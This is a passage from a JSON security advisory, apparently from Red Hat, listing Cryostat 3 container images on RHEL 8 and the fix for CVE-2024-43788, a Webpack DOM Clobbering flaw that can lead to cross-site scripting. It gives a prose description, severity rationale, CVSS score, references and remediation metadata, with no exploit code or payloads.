"cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product_id: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product_id: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product_id: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product_id: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product_id: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product_identification_helper: { purl: "pkg:oci/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8&tag=3.0.1-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", }, product_reference: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", }, product_reference: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", }, product_reference: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", }, product_reference: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", }, product_reference: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", }, product_reference: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", }, product_reference: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", }, product_reference: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", }, product_reference: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", }, product_reference: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", }, product_reference: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", }, product_reference: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", }, product_reference: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", }, product_reference: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T01:12:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", 